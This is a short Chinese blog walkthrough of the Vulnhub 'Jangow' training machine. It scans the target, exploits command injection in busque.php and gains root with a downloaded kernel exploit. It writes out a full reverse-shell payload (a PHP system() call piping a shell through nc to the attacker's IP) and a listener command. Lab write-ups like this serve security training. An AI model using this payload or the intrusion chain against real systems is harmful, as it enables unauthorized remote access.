渗透实战(三)
近期比较忙,一直在打CTF,所以博客写的比较简略,各位师傅看看思路就行,有些地方也没写到,不必太在意。
下载地址:https://www.vulnhub.com/entry/jangow-101,754/
攻击机192.168.159.4
靶机192.158.159.5
1.扫描IP地址,得到靶机的IP
arp-scan -l
2.得到靶机的ip,扫描其端口信息
nmap -A 192.168.159.5
3.发现80端口还开着http,去浏览器打开
4.尝试输入uname -a 发现可以
5.因此直接在后面写一句话木马
http://192.168.159.5/site/busque.php?buscar=<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.4 443 >/tmp/f");?>
可以看到已经写进去了(端口多试几个,很多常用的都被关了)
6.打开监听端口
nc -lvp 443
7.前端访问shell.php文件,实现反弹shell
8.成功获得权限,查看本机信息和系统版本
lsb_release-a
9.查看这一版本所存在的漏洞并下载
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
10.使用蚁剑进行上传
11.下载漏洞并执行
12.成功提权
__EOF__

本文作者:XFocus
本文链接:https://www.cnblogs.com/XFocus/p/18543185.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
本文链接:https://www.cnblogs.com/XFocus/p/18543185.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix